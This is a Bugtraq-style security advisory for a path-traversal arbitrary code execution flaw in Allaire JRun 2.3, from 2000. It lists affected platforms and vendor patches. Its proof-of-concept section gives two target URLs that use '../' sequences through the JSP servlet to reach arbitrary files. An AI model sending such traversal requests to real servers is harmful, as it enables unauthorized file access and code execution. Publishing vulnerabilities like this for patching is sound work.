BID:1831

Allaire JRun 2.3 Arbitrary Code Execution Vulnerability

Info

Allaire JRun 2.3 Arbitrary Code Execution Vulnerability

Bugtraq ID:	1831
Class:	Access Validation Error
CVE:
Remote:	Yes
Local:	Yes
Published:	Oct 23 2000 12:00AM
Updated:	Oct 23 2000 12:00AM
Credit:	Discovered and posted in a Foundstone Labs <[email protected]> Security Advisory on Oct 23, 2000.
Vulnerable:	Macromedia JRun 2.3 .x - IBM AIX 4.3 - IBM AIX 4.2 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - Redhat Linux 6.1 sparc - Redhat Linux 6.1 i386 - Redhat Linux 6.1 alpha - Redhat Linux 6.0 sparc - Redhat Linux 6.0 - SGI IRIX 6.5 - Sun Solaris 7.0 - Sun Solaris 2.6

Not Vulnerable:

Exploit / POC

Allaire JRun 2.3 Arbitrary Code Execution Vulnerability

http://target/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../path/to/filename

http://target/servlet/jsp/../../path/to/filename

Solution / Fix

Allaire JRun 2.3 Arbitrary Code Execution Vulnerability

Solution:
Allaire has provided the following patches which rectify this issue:

Macromedia JRun 2.3 .x

Allaire jr233p_ASB00_28_29
Windows 95/98/NT/2000 and Windows NT Alpha
http://download.allaire.com/jrun/jr233p_ASB00_28_29.zip

Allaire jr233p_ASB00_28_29tar
UNIX/Linux patch - GNU gzip/tar
http://download.allaire.com/jrun/jr233p_ASB00_28_29.tar.gz

References

Allaire JRun 2.3 Arbitrary Code Execution Vulnerability

References:

JRun Product Homepage (Allaire)